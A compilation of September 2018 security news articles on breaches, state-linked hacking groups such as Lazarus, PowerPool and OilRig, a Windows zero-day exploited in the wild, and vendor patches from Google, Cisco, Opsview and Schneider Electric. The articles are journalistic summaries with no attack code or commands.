The NCA is set up to tackle the most serious and organised crime posing the highest risk to public security in Britain.

- Past IT issues -

BA apologised in July after technology issues caused dozens of its flights to and from London Heathrow Airport to be cancelled.

The airline said the problem was down to an incident with an IT system.

And in May 2017, British Airways suffered a major computer system failure triggered by a power supply issue near Heathrow which left 75,000 customers stranded.

IAG, which owns British Airways and Spanish carrier Iberia, said last month that first-half profits more than doubled.

Earnings after taxation flew to 1.4 billion euros ($1.6 billion) in the first six months of 2018 compared with 607 million euros a year earlier, IAG said in a results statement.

The London-listed group, which is also the owner of Irish airline Aer Lingus and Spanish carrier Vueling, added that total revenues swelled three percent to 11.2 billion euros.

BA announced last month that it will halt flights to Tehran in September, citing low profitability as the US reimposes sanctions on Iran.

Fighting Alert Fatigue With Security Orchestration, Automation and Response
7.9.2018 securityweek Security

New research confirms and quantifies two known challenges for security operations teams: they don't have enough staff and would benefit from automated tools.

Demisto's State of SOAR (security orchestration, automation and response) Report, 2018 (PDF) was researched via the ViB community of more than 1.2 million IT practitioners and decision makers. A total of 262 security professionals from 245 companies in a wide range of industry sectors and sizes, mostly in the U.S., took part in the survey. The results show that the two primary and related challenges for SOC and IR staff are not enough time (80.39% of respondents) and too few staff (78.76%) to handle the workload.

“We’ve seen plenty of research that highlights the unending growth in security alerts, a widening cyber security skills gap, and the ensuing fatigue that is heaped upon understaffed security teams," explains Rishi Bhargava, Co-founder of Demisto. "That’s why we conducted this study which allowed us to dig deeper into these issues, their manifestations, as well as possible solutions. Our results produced captivating insights into the state of SOAR in businesses of all sizes.”

"The pattern that stands out starkly from these results," notes the report, "is that the security skills gap continues to be a challenge." The finer detail of these results, however, is less expected: retaining staff is not much easier than finding them (60.1% against 75.2%). Sixty-seven percent of security staff move on to new companies in less than four years, with 26.4% leaving within two years.

This is primarily down to money. Nearly 65% of those who leave their current employment do so because they can earn more elsewhere. Furthermore, asked what is important to infosec employees, 71.26% replied, a 'higher salary'. The often lauded 'company culture' ranked only fifth in importance at 49.43%.

The implication is that smaller companies with smaller budgets hire newcomers, train them and provide the experience that is attractive to larger companies who simply poach experienced security staff with more money. This in turn means that it is the smaller business that is most affected by the overall security skills gap.

It's worth noting, however, that moving on to greener pastures is not the only cause of failing to retain existing staff. As many as 27.2% of security employees leave because of over work and fatigue. This echoes a comment from Jerome Segura at Malwarebytes: "There's a lot of burnout in infosec. It's tough, but that's the reality. If you're in infosec, you're on call 24/7."

According to the report's respondents, their primary concerns -- or pain points -- are they currently receive too many alerts (cited by 46.4% of respondents; an issue that will be aggravated by staff shortages); and too many false positives within those alerts (cited by 69% of respondents; an issue that is technology based).

Affecting both of these (but not specifically cited as a pain point) is the number of different tools used by the security team. More than three-quarters of the respondents have to learn how to use more than four different security tools for effective security operations and incident response. "With the number of tools constantly on the rise, high training times and attrition rates truly spell out the gravity of the human capital challenge facing the industry today."

Bhargava explains further. “Security deployment has become fractured with innumerous specialized tools, making it increasingly difficult for security teams to manage alerts across disparate systems and locations, particularly considering the talent shortage present in security today,” said Bhargava. “There is a great opportunity for SOAR tools to help unify these products and processes, using automated response to reduce alert fatigue and direct analyst resources to the alerts which are most likely to cause harm.”

It is Demisto's premise -- it is itself a SOAR vendor -- that SOAR technology can help alleviate these difficulties. "An important goal of our study was to find and validate linkages between high incident loads, high response teams, and the desire for automation." First the report quantifies the individual workload. More than 12,000 alerts are reviewed each week; and each alert takes more than 4 days to resolve.

There are simply too many alerts for the security team to handle manually. It is, says the report, "clear that there’s a vicious cycle in effect. Alert volume leads to increased MTTR [mean time to respond] which in turn leads to even more alert volume." Automation as a solution is already in use, with more than half of the respondents automating or seeing the benefit in automating much of the incident response workload.

"Proactively," says the report, "security operations and threat hunting ranked high on the ‘automation candidates’ list, highlighting security teams’ desire for automation to assist them in identifying incipient threats and vulnerabilities. Reactively, incident response, tracking IR metrics, and case management were felt as good candidates for partial or full automation."

For now, SOAR is still an emergent technology. "A sign of SOAR’s emergent nature is highlighted by around 20% of our responders being unsure about where to include SOAR in their budgets," admits the report. "A growing acknowledgement of SOAR in security budgets will come with increased awareness and continued verifiable benefits in existing SOAR deployments."

Demisto believes, however, that SOAR has the potential to improve proactive threat hunting, standardize incident processes, improve investigations, accelerate and scale incident response, simplify security operations and maintenance, and generally fight the alert fatigue that comes with too few staff responding to too many alerts.

Cupertino, Calif.-based Demisto raised $20 million in a Series B funding round in February 2017, bringing the total raised to $26 million. In May 2018, Gartner included Demisto in its report on 'Cool Vendors in Security Operations and Vulnerability Management'.

U.S. Charges North Korean Over Lazarus Group Hacks
7.9.2018 securityweek CyberCrime

The U.S. Department of Justice on Thursday announced charges against a North Korean national who is believed to be a member of the notorious Lazarus Group, to which governments and the cybersecurity industry have attributed several high profile attacks.

The suspect is Park Jin Hyok, who according to the DOJ worked for a North Korean government front company known as Chosun Expo Joint Venture and Korea Expo Joint Venture (KEJV). The Democratic People’s Republic of Korea allegedly used this company, which also has offices in China, to support its cyber activities.

The complaint, filed on June 8 in a U.S. District Court in Los Angeles and made public on Thursday, accuses Park and other members of the Lazarus Group of conducting destructive cyberattacks that resulted in “damage to massive amounts of computer hardware and extensive loss of data, money and other resources.”United States charges North Korean hacker of the Lazarus Group

The complaint describes both successful and unsuccessful campaigns of the threat actor, but it focuses on four operations: the 2014 Sony Pictures Entertainment hack, the $81 million cyber heist from the central bank of Bangladesh in 2016, the 2017 WannaCry ransomware attack, and attempts to breach the systems of several U.S. defense contractors, including Lockheed Martin, over the course of 2016 and 2017.

Five Eyes countries and Japan last year officially blamed North Korea for the WannaCry attack.

According to the DOJ, Park worked as a computer programmer at KEJV, which has been linked to DPRK military intelligence. Park allegedly did programming work for the company’s paying clients, while also engaging in malicious activities on behalf of Pyongyang.

The man has been charged with one count of conspiracy to commit computer fraud and abuse, for which he faces up to five years in prison, and one count of conspiracy to commit wire fraud, which carries a sentence of up to 20 years in prison.

“DPRK cyber adversaries represent some of the most active and disruptive threat groups today,” said Dmitri Alperovitch, CTO and co-founder of CrowdStrike. “Their tradecraft continues to grow in sophistication, leveraging cyber capabilities for conducting data exploitation, data destruction, cyber espionage and financially-motivated criminal activity — often costing organizations millions of dollars in damages. In the past year, we’ve witnessed DPRK commit to expansive cyber operations in support of their ability to service regime priorities and effectuate national interest. These crimes have impacted the global financial system and nearly every sector of the economy.”

“One of the most important steps taken towards achieving effective cyber deterrence is the attribution of these attacks and holding the perpetrators accountable, as we witnessed today by the announcement of the US Department of Justice,” Alperovitch added.

FDD Senior Fellow David Maxwell, who specializes in North Korea’s nuclear and cyber threats, noted that the charges represent a critically important development.

“Although there is a significant time lapse between the hack and this indictment, it shows that the U.S. is tracking the North Korea threat, and that despite the current nuclear diplomacy the U.S. will pursue cyber operatives and hacker/criminals who wish to do the U.S. and the U.S. economy harm,” Maxwell said via email.

“The U.S. has to address cyber threats, though this is just one very small step toward improving cyber defenses. The U.S. has to make it known it will hunt down hackers who do us harm, whether they are individuals or working for state actors such as North Korea,” he added.

This is not the first time the United States has charged foreign nationals over cyberattacks believed to have been sponsored – or at least condoned – by their respective governments. The DOJ in the past years unsealed indictments against Chinese, Russian, Syrian and Iranian nationals.

Recently uncovered PowerPool Group used recent Windows Zero-Day exploit
7.9.2018 securityaffairs

Security experts from ESET observed a treat actor, tracked as PowerPool, exploiting the recently disclosed Windows zero-day flaw in targeted attacks.
The vulnerability was publicly disclosed on August 27 by the security expert “@SandboxEscaper,” the researcher also published the exploit code for the vulnerability.

The vulnerability affects Microsoft’s Windows operating systems that could be exploited by a local attacker or malicious program to obtain system privileges on the vulnerable system.

The vulnerability resides in the Windows’ task scheduler program and ties to errors in the handling of Advanced Local Procedure Call (ALPC) systems.

Microsoft was expected to address the vulnerability in September security Patch Tuesday, that is scheduled for September 11, but the news of live attacks exploiting the issue could force the company to roll out a patch sooner.

Security community 0patch has also released an unofficial patch for the vulnerability.

Now security researchers from ESET reported the local privilege escalation vulnerability has been exploited by a previously unknown group tracked as PowerPool.

“As one could have predicted, it took only two days before we first identified the use of this exploit in a malicious campaign from a group we have dubbed PowerPool.“reads the analysis published by ESET.

“This group has a small number of victims and according to both our telemetry and uploads to VirusTotal (we only considered manual uploads from the web interface), the targeted countries include Chile, Germany, India, the Philippines, Poland, Russia, the United Kingdom, the United States and Ukraine.”

The threat actor leveraged the Windows zero-day exploit in targeted attacks against a small number of users located in the United States, the United Kingdom, Germany, Ukraine, Chile, India, Russia, the Philippines, and Poland.

According to ESET, attackers have modified the publicly available exploit source code and recompiled it.

To obtain a Local Privilege Escalation, the attacker needs to properly choose the target file that will be overwritten. The target file, in fact, has to be a file that is executed automatically with administrative rights.

“PowerPool’s developers chose to change the content of the file C:\Program Files (x86)\Google\Update\GoogleUpdate.exe. This is the legitimate updater for Google applications and is regularly run under administrative privileges by a Microsoft Windows task.” continues the analysis.

PowerPool’s attack vector is spear-phishing messages, ESET researchers pointed out that the same group was also responsible for a spam campaign spotted by SANS in May that used Symbolic Link (.slk) files to spread malicious codes.

PowerPool group

The group used a multi-stage malware, the first stage is a backdoor used for a reconnaissance activity. It determines if the infected machine is interesting for the attackers, in this case, the malicious code downloads a second stage backdoor that supports various commands such as uploading and downloading files, killing processes, and listing folders.

The analysis of the second-stage backdoor allowed the researchers to determine that the malicious code is not “a state-of-the-art APT backdoor.”

“Once the PowerPool operators have persistent access to a machine with the second-stage backdoor, they use several open-source tools, mostly written in PowerShell, to move laterally on the network.” continues the report.

The tools used by the attackers include PowerDump, PowerSploit, SMBExec, Quarks PwDump, and FireMaster.

“This specific campaign targets a limited number of users, but don’t be fooled by that: it shows that cybercriminals also follow the news and work on employing exploits as soon as they are publicly available,” ESET concluded.

Further details, including the IoCs are reported in the analysis published by ESET.

Attackers Abuse Age Restrictions to Hide Apps on iOS Devices
6.9.2018 securityweek Apple

Malicious actors leveraging an open source mobile device management (MDM) system have been abusing a legitimate iOS feature to hide legitimate applications and trick victims into using malicious counterparts.

The attacks, first exposed by Talos’ security researchers in July, involved the use of malicious versions of five programs (AppsSLoader, Telegram, WhatsApp, PrayTime, and MyApp) that were then deployed onto iOS devices to steal messages.

Given how the enrollment process for the MDM works, the security researchers assumed right from the start that the rogue applications were being installed either via direct access to the compromised devices or through sophisticated social engineering. Each step of the enrollment process required user interaction, Talos discovered.

The security researchers now reveal that the attackers abused the MDM solution to control the victims’ devices and deploy a new profile onto them. Next, the actors leveraged the age rating restriction functionality in iOS to hide the legitimate apps.

The age ratings for WhatsApp and Telegram are 12-plus and 17-plus, respectively, and the actors set the age rating limit to 9-plus. Thus, the legitimate apps would no longer be shown on the device and the victim was only able to access the rogue variants instead.

“The app still exists on the device, however, the user will not be able to interact with it, even if the user searches for the app using the search function on the iOS device. It simply does not open. All mobile device users should be aware of these attack methods as to prevent attackers from gaining control of their phones through an MDM,” Talos explains.

iOS supports the configuring of devices using profiles, and the MDM enrollment mechanism too is performed using a profile. Such profiles are easy to create and Apple even offers an official tool for that. These apps allow for the restriction of app usage, but the app restriction is usually limited to the supervised device.

The iPhones impacted by these attacks, however, were not in supervised mode. Instead, the attackers abused the age rating to forbid the usage of apps rated for ages 9 and above. Thus, the apps remained on the device but could no longer be accessed.

“Once this profile is installed on the iOS device, the applications restricted by the age rating stay installed, but can no longer be used or accessed, and the icon disappears from the device springboard,” Talos explains.

The profile can be installed manually via Apple Configurator, or by opening the profile XML from Safari. Once that happens, a new entry appears in the Settings > General > Profile menu. However, if the MDM deploys the profile, it does not appear there (the MDM enrollment profile will be present).

“It's important to note here that there is no malicious malware, vulnerability or zero-day used to enroll the phone within the MDM. It is a legitimate method of device administration that is used within enterprises throughout the world. The attacker has merely leveraged this process,” the researchers note.

Users can head to Settings > General > Profiles & Device Management > [MDM configuration] on their iOS devices to view information about the restrictions and applications set/installed by MDM profiles. If no Profiles & Device Management menu is available, the device is not enrolled.

Mozilla Appoints New Policy, Security Chief
6.9.2018 securityweek Security

Mozilla on Tuesday announced that Alan Davidson has been named the organization’s new Vice President of Global Policy, Trust and Security.

According to Mozilla Chief Operating Officer Denelle Dixon, Davidson will work with her on scaling and reinforcing the organization’s “policy, trust and security capabilities and impact.”

His responsibilities will also include leading Mozilla’s public policy work on promoting an open and “healthy” Internet, and supervising a security and trust team whose focus is on promoting “innovative privacy and security features.”

“For over 15 years, Mozilla has been a driving force for a free and open Internet, building open source products with industry-leading privacy and security features. I am thrilled to be joining an organization so committed to putting the user first, and to making technology a force for good in people’s lives,” said Davidson.Alan Davidson named Mozilla’s new VP of Global Policy, Trust and Security

Prior to joining Mozilla, Davidson worked for the U.S. Department of Commerce, the New America think tank, and Google. At Google, he helped launch the tech giant’s Washington D.C. office and led the company’s public policy and government relations efforts in the Americas.

“Alan is not new to Mozilla,” Dixon said. “He was a Mozilla Fellow for a year in 2017-2018. During his tenure with us, Alan worked on advancing policies and practices to support the nascent field of public interest technologists — the next generation of leaders with expertise in technology and public policy who we need to guide our society through coming challenges such as encryption, autonomous vehicles, blockchain, cybersecurity, and more.”

Mozilla last week laid out plans to add various anti-tracking features to Firefox in an effort to protect users and help them choose what information they share with the websites they visit.

The new features include a mechanism designed to block trackers that slow down page loads, stripping cookies and blocking storage access from third-party tracking content, and blocking trackers that fingerprint users and sites that silently mine cryptocurrencies. Some of these new features are already present in Firefox Nightly and are expected to become available in the stable release of the web browser in the near future.

Iranian Hackers Improve Recently Used Cyber Weapon
6.9.2018 securityweek BigBrothers

The Iran-linked cyberespionage group OilRig was recently observed using a variant of the OopsIE Trojan that was updated with new evasion capabilities, Palo Alto Networks reports.

The group has been persistently targeting government entities in the Middle East with previously identified tools and tactics, including the OopsIE Trojan that was first identified in February 2018. Unlike previously observed samples, the new iteration packs anti-analysis and anti-virtual machine capabilities, which allows it to further evade detection.

The attacks involving this Trojan variant were detected in July, as part of a campaign that also delivered the QUADAGENT backdoor. However, each malicious program was targeting a different organization.

As part of that wave of attacks, the hackers were using compromised email accounts at a government organization in the Middle East to send spear phishing emails delivering the OopsIE Trojan. The attacks targeted a government agency within the same nation state, Palo Alto Networks’ researchers found.

The email was sent to the email address of a user group that had published documents regarding business continuity management on the Internet. The attackers used lures specifically crafted for this assault.

The OopsIE Trojan begins execution by performing multiple anti-virtualization and sandbox checks. The malware would check CPU fan information, temperature, mouse pointer, hard disk, motherboard, time zone, and human interaction, while also looking for DLLs associated with Sandboxie, VBox, and VMware.

While some of these techniques have been observed in other malware before, OopsIE appears to be the first to check the CPU fan. The CPU temperature check was previously seen being used by GravityRAT.

The time zone check is also of interest, as the Trojan would only execute if it finds strings for Iran, Arab, Arabia and Middle East. These point to five time zones that encompass 10 countries, showing that the malware is highly targeted.

The updated Trojan variant packs most of the functionality previously associated with the threat, but also includes obfuscation, in addition to requiring the user to interact with an error dialog box (the last in the previously mentioned series of checks).

Next, the malware sleeps for two seconds, then moves itself to the App Data folder and creates a scheduled task to run a VBScript that ensures persistence. The process attempts to run the Trojan every three minutes.

The malware then starts communication with the command and control (C&C) server (it uses the www.windowspatch[.]com domain as C&C).

The malware includes support for various commands that it receives from the server. It can run the command, write the output to a file and send it to the server; download a file to the system; read a specified file and upload its contents, and uninstall itself.

“Within the time frame we have been tracking the OilRig group, they have repeatedly shown a willingness to add less commonly found functionality to their tools, such as their heavy use of DNS tunneling in their backdoors or adding authentication to their webshells. This attack is no different, now adding anti-analysis capabilities into their tools. This adversary is highly resourceful and continues to adapt over time,” Palo Alto Networks concludes.

Windows Zero-Day Exploited in Targeted Attacks by 'PowerPool' Group
6.9.2018 securityweek

A threat group tracked by security firm ESET as “PowerPool” has been exploiting a Windows zero-day vulnerability to elevate the privileges of a backdoor in targeted attacks.

The flaw was disclosed on August 27 by a researcher who uses the online moniker “SandboxEscaper.” The security hole was not reported to Microsoft before its details were made public – including a compiled exploit and its source code – as SandboxEscaper was apparently frustrated with the company’s vulnerability reporting process.

Other members of the industry quickly confirmed the vulnerability, which seems to affect the Advanced Local Procedure Call (ALPC) interface of the Windows Task Scheduler. Malicious actors with local access to the targeted device can exploit the flaw to escalate privileges to SYSTEM by overwriting files that should normally be protected by filesystem access control lists (ACLs).

The public exploit has been confirmed to work on 64-bit versions of Windows 10 and Windows Server 2016, with the possibility to adapt it for 32-bit systems as well.

Microsoft has launched an investigation, but it has yet to release a patch or provide mitigations. While the tech giant initially suggested that a fix may be released with its regular Patch Tuesday updates, the company may roll out a patch sooner now that the vulnerability has been exploited in malicious attacks.

In the meantime, 0patch has released an unofficial fix for the vulnerability and CERT/CC’s advisory for the bug describes some mitigations.

According to ESET, the local privilege escalation vulnerability has been exploited by a newly uncovered group it tracks as PowerPool. Based on the security firm’s telemetry and malware samples uploaded to VirusTotal, the threat actor appears to have leveraged the Windows zero-day against a small number of users located in the United States, the United Kingdom, Germany, Ukraine, Chile, India, Russia, the Philippines and Poland.

ESET researchers determined that PowerPool slightly modified the publicly available exploit source code and recompiled it for its attacks.

The hackers, whose possible origins have not been discussed by the security firm, have used the zero-day to overwrite C:\Program Files(x86)\Google\Update\GoogleUpdate.exe, a legitimate updater for Google applications. Since this file is regularly executed in Windows with administrative privileges, overwriting it with their malware has allowed the attackers to obtain elevated permissions on the targeted system.

ESET believes PowerPool attacks begin with a malware-carrying email being sent to the targeted user. While the campaign involving the zero-day appears to be highly targeted, an interesting spam campaign spotted by SANS in May, which used Symbolic Link (.slk) files for malware distribution, was apparently carried out by the same group.

The first stage malware used by PowerPool, which is delivered via the initial emails, is a backdoor designed for reconnaissance purposes. If the infected machine presents an interest to the attackers, the malware downloads a second stage backdoor capable of executing commands on the system, uploading and downloading files, killing processes, and listing folders.

The files downloaded by the second stage malware to compromised devices include several open source tools that allow the attackers to move laterally on the network. The list includes PowerDump, PowerSploit, SMBExec, Quarks PwDump, and FireMaster.

ESET has described this second stage malware as “clearly not a state-of-the-art APT backdoor.”

“This specific campaign targets a limited number of users, but don’t be fooled by that: it shows that cybercriminals also follow the news and work on employing exploits as soon as they are publicly available,” ESET concluded.

Latest Version of Chrome Improves Password Management, Patches 40 Flaws
6.9.2018 securityweek

Google this week celebrates 10 years of its Chrome web browser with the release of a new version that provides users with security improvements, new features, and patches for 40 vulnerabilities.

The highly popular web browser now has an improved password manager that makes it easier for users to have a unique and strong password for each site. When a user is setting a new password, Chrome can generate it and save it, so that it is easily accessible on both computers and phones.

Chrome 69 also brings updated site indicators, as it no longer marks HTTPS websites with a green lock. Instead, the indicator is now grey, given that Google considers HTTPS connections the norm.

Starting with Chrome 68, Google is marking sites served over HTTP connections as “Not Secure”, in order to warn users that data transmitted between the site and the browser is susceptible to man-in-the-middle attacks and other types of threats. Attackers could even modify the content of web pages before they are delivered to the user.

Some of the new features in the browser include answers directly in the address bar (the Omnibox), improved site shortcut management, and new looks that include modified shape of tabs to make site icons easier to see.

Chrome Enterprise 69 now blocks third-party software to provide users with improved stability, requires users to grant explicit permission for Adobe Flash to run on sites still using it (the permission is asked after each browser restart), and prevents password reuse with a Password Alert policy.

Google also addressed a total of 40 security vulnerabilities with the release of Chrome 69, 22 of which were reported by external researchers. Of these, 7 were High risk flaws, 13 were Medium severity, and 2 were Low risk bugs.

Some of the addressed issues include out of bounds writes (in V8, Blink, WebAudio, Mojo, SwiftShader, Little-CMS , PDFium, and WebRTC), integer overflow in Skia, use after free (in WebRTC and Memory Instrumentation), Site Isolation bypasses, cross origin pixel leak, local file access, content security policy bypass, credit card information leak, URL spoofs, and stack buffer overflow in SwiftShader.

Google paid nearly $30,000 in bug bounty rewards to the reporting researchers, but the company hasn’t revealed information on all of the awarded bounties.

The latest browser iteration is now available for download for Windows, Mac and Linux as Chrome 69.0.3497.81.

Multiple Vulnerabilities Addressed in Opsview Monitor
6.9.2018 securityweek

Opsview recently addressed a series of remote code-execution, command-execution and local privilege-escalation vulnerabilities in the Opsview Monitor.

A proprietary monitoring application for networks and applications, Opsview Monitor “helps DevOps teams deliver smarter business services by providing unified insight into their dynamic IT operations whether on-premises, in the cloud, or hybrid,” the company says.

The software is impacted by five vulnerabilities that could provide attackers with the ability to access the management console and execute commands on the operating system.

Discovered by Core Security researchers earlier this year, the bugs were confirmed to impact all supported versions of Opsview Monitor (5.4, 5.3 and 5.2). In addition to patches (the 5.4.2 and 5.3.1 updates) for the affected versions, Opsview also released a new product iteration that removed the issues from the start.

A virtual appliance deployed inside the organization's network infrastructure, Opsview Monitor is bundled with a Web Management Console that allows for the monitoring and management of hosts and their services.

The first two issues found in the appliance could be abused to execute malicious JavaScript code in the context of a legitimate user. These are CVE-2018-16148, a reflected Cross-Site Scripting (XSS) in the 'diagnosticsb2ksy' parameter of the '/rest' endpoint, and CVE-2018-16147, a persistent XSS in the 'data' parameter of the '/settings/api/router' endpoint.

“The input will be stored without any sanitization and rendered every time the /settings section is visited by the user. […] this XSS is self-stored and it's executed only in the context of the victim's session. [The] vulnerability can be exploited by an attacker to gain persistency and execute the malicious code each time the victim accesses to the settings section,” Core Security explains.

Two other vulnerabilities could allow an attacker to obtain command execution on the system as the nagios user. Tracked as CVE-2018-16146 and CVE-2018-16144, both of these are improper sanitization bugs.

Tracked as CVE-2018-16145, the fifth vulnerability could lead to local privilege escalation. An attacker could edit a specific part of a script to execute code once the appliance is rebooted (at boot, scripts impersonate the nagios user during their execution).

The bugs were reported to Opsview in early May and were confirmed within a week. The company released Opsview Monitor 6.0 at the end of July and pushed fixes for previous software iteration last week.

Uber Announces Ramped Up Passenger Security
6.9.2018 securityweek Security

Uber chief Dara Khosrowshahi said on Wednesday the smartphone-summoned ride service is reinforcing safeguards for passengers and their personal information.

Features to be added to the app in the coming months include "Ride Check," which uses location tracking already built into the service to detect when cars have stopped unexpectedly.

If a crash is suspected, the driver and passenger will receive a prompt on their phones to order a courtesy ride or use the in-app emergency call button introduced earlier this year.

"This technology can also flag trip irregularities beyond crashes that might, in some rare cases, indicate an increased safety risk," Khosrowshahi said in a blog post.

"For example, if there is a long, unexpected stop during a trip, both the rider and the driver will receive a Ride Check notification to ask if everything is OK."

Uber, which operates in 65 countries, has disrupted transport in many locations despite regulatory hurdles and resistance from taxi operators.

The company has been touting a safety-first message amid plans for an initial public offering of shares late next year.

Khosrowshahi said the service will begin leaving pick-up and drop-off addresses out of drivers' trip history logs, showing only general areas to avoid creating databases of sensitive locations such as home addresses.

The service already lets drivers and passengers waiting to be picked up communicate through the app without revealing their phone numbers. People can also request pick-ups at intersections instead of specific street addresses.

"Uber has a responsibility to help keep people safe, and it's one we take seriously," Khosrowshahi said.

"We want you to have peace of mind every time you use Uber, and hope these features make it clear that we've got your back."

Cisco Patches Serious Flaws in RV, SD-WAN, Umbrella Products
6.9.2018 securityweek

Cisco informed customers on Wednesday that patches are available for over a dozen critical and high severity vulnerabilities affecting the company’s RV series, SD-WAN, Umbrella and other products.

Two of the flaws have been rated “critical” by Cisco. One of them, CVE-2018-0423, is a buffer overflow vulnerability in the web-based management interface of various RV series firewalls and routers. The security hole allows a remote and unauthenticated attacker to cause a denial-of-service (DoS) condition or to execute arbitrary code.

The second flaw assigned a “critical” rating by the networking giant is CVE-2018-0435 and it impacts the Cisco Umbrella API. A remote attacker could leverage the vulnerability to read or modify data across multiple organizations, but exploitation requires authentication. Cisco noted that the bug has been addressed in the API and no user interaction is required to apply the patch.

The critical vulnerability affecting RV series devices was reported to Cisco by Qingtang Zheng of the 360 ESG CodeSafe Team, who also discovered three additional high severity flaws in the management interface of these products.

Two of the flaws allow an attacker to remotely gain access to sensitive information and one can be exploited for arbitrary command execution, but the latter requires authentication.

The Umbrella solution is also affected by some high severity flaws. Specifically, the Umbrella Enterprise Roaming client has a couple of weaknesses that can be exploited by an authenticated attacker to elevate privileges to “Administrator.” These issues were discovered by a researcher from Critical Start, which has published its own blog post providing detailed technical information.

Cisco’s SD-WAN solution is also impacted by high severity vulnerabilities. They can allow hackers to gain access to sensitive data, execute commands as root, and elevate privileges, but some require either local access and/or authentication.

The company also informed customers that patches are available for serious privilege escalation and information disclosure bugs in WebEx, a DoS flaw in Prime Access Registrar, a privilege escalation in Data Center Network Manager, and two command injections in the Integrated Management Controller (IMC) software.

Cisco is not aware of any instances where these vulnerabilities have been exploited for malicious purposes.

Man Charged With Cyberstalking Women for Explicit Photos
6.9.2018 securityweek Cyber

LOS ANGELES (AP) — A former NASA contractor who allegedly threatened to publish nude photos of seven women unless they sent him other explicit pictures has been arrested at his Los Angeles home.

Richard Bauer was arrested Wednesday.

Prosecutors say Bauer contacted some victims through Facebook and got them to reveal information he could use to reset their online passwords. He allegedly got other victims to install computer malware that allowed him to obtain email and website passwords.

Bauer allegedly threatened to post nude photos he'd obtained of the victims online unless they sent more photos.

He's facing 14 federal charges of stalking, unauthorized computer access and identity theft, which carry a possible 64-year sentence.

Bauer worked at NASA's Armstrong Flight Research Center in Southern California.

It's unclear if he has a lawyer.

VPN Company AnchorFree Raises $295 Million
6.9.2018 securityweek IT

AnchorFree, the company that makes the popular Hotspot Shield virtual private network (VPN) software, on Wednesday announced that it raised $295 million in a new funding round.

The latest funding brings the total raised by the California-based company to nearly $358 million, which represents a significant amount for a VPN services provider. These types of services have become increasingly popular following the numerous privacy-related scandals involving governments and private firms.

The round was led by media and tech investment group WndrCo with participation from Accel, 8VC, SignalFire, Green Bay Ventures and other investors and executives. Representatives of WndrCo and Accel have joined the company’s board of directors.

According to AnchorFree, the newly secured funds will be used to “further product development and market expansion and drive M&A activity.”

AnchorFree claims its products provide enterprise-level privacy and security for consumers’ mobile devices. This includes protection against ISPs and websites collecting identity data, compromised public Wi-Fi connections, phishing attacks, and malware.

The company, led by CEO and co-founder David Gorodyansky, says its products have been downloaded over 650 million times by users across 190 countries, with 250,000 new downloads each day.

AnchorFree also offers a VPN solution for small and medium-sized businesses, Hotspot Shield for Business. Its VPN technology, called Hydra, has been widely adopted by app developers and licensed by many of the world’s cybersecurity and telecoms companies.

“Anyone who accesses the Internet is vulnerable to data theft and an invasion of online privacy which has real, impactful consequences, and David and the AnchorFree team are deeply mission-driven to address this,” said WndrCo Founding Partner Sujay Jaswa.

“AnchorFree has the two most-downloaded mobile security products, including the #1 mobile VPN product, because they have the fastest most robust technology and they work for the needs of consumers, protecting against phishing, malware, and spam in addition to providing secure Internet access. This growth will only accelerate as the world’s Internet security problems continue to grow, and we look forward to supporting David and his team as they further AnchorFree’s global success in tackling this outstanding market opportunity,” Jaswa added.

AnchorFree was accused last year by the Center for Democracy & Technology (CDT), a nonprofit technology advocacy organization, of collecting user data through Hotspot Shield and sharing it with advertisers. The CDT filed a complaint with the U.S. Federal Trade Commission (FTC) over these allegations. AnchorFree has denied the accusations.

Earlier this year, a researcher disclosed the details of a vulnerability that exposed the names and locations of Hotspot Shield users. The expert made his findings public after claiming that the vendor ignored his attempts to report the flaw. A patch was released a few days later.

Flaw in Schneider PLC Allows Significant Disruption to ICS
6.9.2018 securityweek ICS

A vulnerability discovered in some of Schneider Electric’s Modicon programmable logic controllers (PLCs) may allow malicious actors to cause significant disruption to industrial control systems (ICS).

The flaw was identified by Yehonatan Kfir, CTO of industrial cybersecurity firm Radiflow, as part of an ongoing project whose goal is finding new ICS vulnerabilities. Advisories for this security hole were published recently by both Schneider Electric and ICS-CERT.

The vulnerability, tracked as CVE-2018-7789 and described as an issue related to improper checking for unusual or exceptional conditions, can be exploited by an attacker to remotely reboot Modicon M221 controllers.

According to Schneider, all Modicon M221 controllers running firmware versions prior to, which includes a patch for the issue, are impacted.Schneider Electric Modicon M221 controllers affected by serious vulnerability

Radiflow’s Kfir told SecurityWeek that while Schneider responded to the vulnerability in a “highly professional manner,” his company does not agree with the severity rating assigned by the vendor – ICS-CERT and Schneider assigned a CVSS score of 4.8, which puts the flaw in the “medium severity” category.

“In general the assessment for the scoring is usually assessed from the perspective of IT, which takes into account the vulnerability’s impact on the potential for confidential data to be compromised,” Kfir explained. “This of course is important, although less relevant to OT operations and as such the reason we think that the score could have been higher.”

“This CVE could have resulted in the controller getting stuck and causing its communication to drop from the OT network. Disconnecting the PLC from the HMI certainly has more than a low impact on the availability of the OT network. To recover from such a problem, an onsite visit from a technician to do a power reset is required. The impact of such a situation on availability seems much higher than reflected in the scoring,” the expert added.

In a press release Radiflow will publish on Thursday, the company says an attack exploiting this flaw “would cause significant downtime to the ICS network.”

Schneider Electric Modicon M221 controllers affected by serious vulnerability

The CVSS score is also lowered due to the “attack complexity” metric being described as “high.” Kfir admits that an attacker would need to be familiar with Schneider’s proprietary protocols in order to exploit the bug, but argued that threat groups focused on targeting industrial systems – one good example is the actor behind the Triton attack – have already demonstrated these types of capabilities.

“Although it may be complex for a novice to exploit this vulnerability, it would not have been difficult at all for experienced hackers to leverage this vulnerability,” Kfir said.

Radiflow says its researchers have identified two ways to exploit the vulnerability and they both work remotely. Worryingly, Kfir told SecurityWeek that a simple Shodan search revealed over 100 vulnerable devices directly accessible from the Internet.

“It is just a matter of a few clicks that could have led to a cyberattack to take down those vulnerable PLCs.” Kfir said.

Earlier this year, Radiflow reported that a piece of cryptocurrency mining malware worked its way onto servers connected to an OT network at a wastewater facility in Europe.

Other vulnerabilities in Modicon M221 controllers

Different advisories published in recent days by ICS-CERT and Schneider Electric describe three other vulnerabilities discovered by researchers in Modicon M221 controllers.

These security holes, all classified as “high severity,” can be exploited to upload the original PLC program, and decode the device’s password using a rainbow table.

Irfan Ahmed, Hyunguk Yoo, Sushma Kalle, and Nehal Ameen of the University of New Orleans have been credited for finding these flaws.

These security holes have also been addressed by Schneider with the release of firmware version

What's GRU? A Look at Russia's Shadowy Military Spies
6.9.2018 securityweek BigBrothers

MOSCOW (AP) — GRU isn't as well-known a baleful acronym as KGB or FSB. But Russia's military intelligence service is attracting increasing attention as allegations mount of devious and deadly operations on and off the field of battle.

The latest charge came Wednesday, when Britain identified two suspects in this year's nerve-agent poisonings as GRU agents.

